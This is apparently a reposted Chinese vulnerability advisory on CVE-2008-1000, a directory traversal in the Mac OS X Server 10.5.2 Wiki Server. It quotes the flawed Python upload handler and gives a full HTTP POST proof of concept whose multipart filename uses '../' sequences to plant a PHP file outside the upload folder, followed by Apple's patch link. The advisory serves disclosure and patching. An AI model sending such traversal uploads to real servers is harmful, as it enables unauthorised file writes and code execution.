发布日期：2008-03-17
更新日期：2008-03-19

受影响系统：

Apple MacOS X Server 10.5.2

描述：

---

BUGTRAQ  ID: 28278
CVE(CAN) ID: CVE-2008-1000

Mac OS X Server也被称为Leopard Server，是苹果发布的集成了多种功能的服务器。

MacOS X Server中默认启用的python Web服务器Wiki Server受目录遍历攻击的影响，远程攻击者可能利用此漏洞控制服务器。

可以编辑wiki内容的用户可以上传文件替换wiki服务器可写入的内容，导致以wiki服务器的权限执行任意代码。以下是/usr/share/wikid/lib/python/apple_wlt/ContentServer.py文件中有漏洞的代码段：

/-----------

def uploadFileCallback(self, result):
    filename, filetype, aFile = result[1][self.type][0]
    filename = filename.decode('utf-8')
    filename = filename.split('\\')[-1] # IE sends the whole path,
including your local username.
    extension = filename.split('.')[-1]
    oldFilename = filename
    uploadType = os.path.split(self.fullpath)[-1]
    if uploadType == "images":
        filename = SettingsManager.findGoodName() + '.' + extension
    logging.debug("beginning file upload: %s" % filename)
    isImage = filenameIsImage(filename)
    newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
filename), isImage = (not uploadType == 'attachments'))
    newFilename = os.path.basename(newPath)
    if uploadType == "attachments":
        newParentFolder = os.path.dirname(newPath)
        os.mkdir(newParentFolder)
        newFilename = os.path.join(os.path.basename(newParentFolder), filename)
      [...]


- -----------/

<*来源：Rodrigo Carvalho
  
  链接：http://marc.info/?l=bugtraq&m=120587279702580&w=2
        http://docs.info.apple.com/article.html?artnum=307562
        http://secunia.com/advisories/29420/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/-----------

POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
Host: 192.168.xxx.xxx
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language:
en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: identity, *;q=0
Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
Cookie2: $Version=1
Proxy-Connection: close
Content-length: 426
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21

- ------------YN7xkbcuNgNx21psG30p21

Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"

Content-Type: application/octet-stream



<? phphinfo(); ?>


  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="ok_button"



  Attach

  ------------YN7xkbcuNgNx21psG30p21

  Content-Disposition: form-data; name="upload_id"



  57904

  ------------YN7xkbcuNgNx21psG30p21--

- -----------/

建议：

---

厂商补丁：

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=18157&cat=57&platform=osx&method=sa/SecUpd2008-002.dmg

浏览次数：4043
严重程度：0（网友投票）